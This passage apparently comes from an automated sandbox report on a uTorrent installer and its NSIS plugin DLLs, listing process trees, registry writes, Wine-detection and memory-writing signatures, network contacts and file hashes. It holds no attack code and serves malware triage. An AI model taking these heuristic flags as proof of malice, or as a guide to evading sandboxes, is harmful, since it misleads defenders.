PID 4008 wrote to memory of 4768 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4008 wrote to memory of 4768 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4008 wrote to memory of 4768 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4768 -ip 4768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 460

Network

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 03:49

Platform

win11-20241007-en

Max time kernel

91s

Max time network

94s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\bt_datachannel.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3376 wrote to memory of 4360 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3376 wrote to memory of 4360 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3376 wrote to memory of 4360 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\bt_datachannel.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\bt_datachannel.dll,#1

Network

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 03:49

Platform

win11-20241007-en

Max time kernel

92s

Max time network

95s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3540 wrote to memory of 4380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3540 wrote to memory of 4380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3540 wrote to memory of 4380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4380 -ip 4380

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 544

Network

Country Destination Domain Proto
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 03:49

Platform

win11-20241007-en

Max time kernel

147s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsisFirewall.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2160 wrote to memory of 4720 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2160 wrote to memory of 4720 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2160 wrote to memory of 4720 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsisFirewall.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsisFirewall.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4720 -ip 4720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 468

Network

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 03:49

Platform

win11-20241007-en

Max time kernel

147s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe"

Signatures

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Software\WOW6432Node\Wine C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks installed software on the system

discovery

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-key C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-key C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-skin\Extension = ".btskin" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-appinst C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\Content Type\ = "application/x-bittorrent" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall\Content Type = "application/x-bittorrent-appinst" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\DefaultIcon C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe\" \"%1\" /SHELLASSOC" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-key\Extension = ".btkey" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\ = "open" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-skin C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall\ = "uTorrent" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-appinst\Extension = ".btinstall" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-key\Extension = ".btkey" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btsearch\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btsearch C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\open C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\Content Type C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin\Content Type = "application/x-bittorrent-skin" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-appinst C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btkey\Content Type = "application/x-bittorrent-key" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe\" \"%1\" /SHELLASSOC" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\FalconBetaAccount C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp\ = "uTorrent" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-app C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open\command C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin\ = "uTorrent" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-skin C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\open\command C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\maindoc.ico" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp\Content Type = "application/x-bittorrent-app" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-appinst\Extension = ".btinstall" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btsearch\OpenWithProgids\uTorrent C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-app\Extension = ".btapp" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-skin\Extension = ".btskin" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-app C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\ = "open" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btkey C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btkey\ = "uTorrent" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\FalconBetaAccount\remote_access_client_id = "1112994294" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-app\Extension = ".btapp" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe

"C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe"

C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe

uTorrent.exe /NOINSTALL /BRINGTOFRONT

Network

Country Destination Domain Proto
US 8.8.8.8:53 router.utorrent.com udp
US 8.8.8.8:53 i-21.b-47142.ut.bench.utorrent.com udp
US 67.215.246.203:80 update.utorrent.com tcp
US 44.196.243.250:80 i-21.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:80 i-21.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:80 i-21.b-47142.ut.bench.utorrent.com tcp
IS 82.221.103.245:80 update.utorrent.li tcp
IS 82.221.103.245:80 update.utorrent.li tcp
IS 82.221.103.245:80 update.utorrent.li tcp
IS 82.221.103.245:80 update.utorrent.li tcp
IS 82.221.103.245:80 update.utorrent.li tcp
IS 82.221.103.245:80 update.utorrent.li tcp

Files

memory/1580-0-0x0000000000400000-0x00000000009C3000-memory.dmp

C:\Users\Admin\AppData\Roaming\uTorrent\settings.dat.old

MD5 49b10fd80e6c83f0493121190c2ae7c1
SHA1 1db23123a5cba70235c672ecd3bf7c9459f362df
SHA256 50b49e707baf0e2a3e698d9f93b7d8cb56d2272cd7637ed0f43ed6535e850ded
SHA512 943f90b6eff55fb79871f6c40e1f04a89c2da3499a1aaaeeeaa2f6d4fa755d1bfd67fcf0fe8a40c23c0d224b2013804d8493a0dc96f7ff9bce4a4932ac9e35e9

C:\Users\Admin\AppData\Roaming\uTorrent\toolbar.benc.new

MD5 566aef8c48d777a66d350e47969d18f7
SHA1 e78a32a061df81964d5d69b5fe088e5b57b65dec
SHA256 fd7b41a345db2d429d2479c290f478ae24d63fbdcbd79cc5c86b622e2108d259
SHA512 413039035b5e570dbbe157a761ed4d3054c0f8e2fe1dda2d463cb4bf0ed588a27492e8ff04f5a8d327f39038c1c841c17d17844715e797037880f52e505c6d2d

memory/1580-25-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/1580-26-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/1580-27-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/1580-28-0x0000000000400000-0x00000000009C3000-memory.dmp

C:\Users\Admin\AppData\Roaming\uTorrent\settings.dat.old

MD5 2532be093fef3e466023e7821b5c94b4
SHA1 97568b8135a92c0fa50d42dceb458225a873bc03
SHA256 e3e0f1bef8d5e3a77d0f221186b658d470e2bee782f67109c90671568eb5aa3d
SHA512 0402fffdee809467019a2ad8533dddfd241f02d332509b5efb936aee79fbc155c322e7263eaa268d76897b7906f0489d884861ef49b3ecda4a90a2cb984701c1

C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe

MD5 b7f8a3909ad963d5b5260dacfa897e6e
SHA1 030ed1e99cb6d681dadca6068caf194bf67580e9
SHA256 8837428a93c7ee46b9772d6c857e109e9baa0f5b28450f87fff7c0e8b87cf017
SHA512 42569e974ef38ddea3300c6d82fd5e371c3cff8bdb04311c6bf3d94727fc37c5ef223ad07198ca2e499528a1671593ea6ef2bf3000611dbda49ca0a0c59c6bb4

memory/1580-44-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/1240-45-0x0000000000400000-0x00000000009C3000-memory.dmp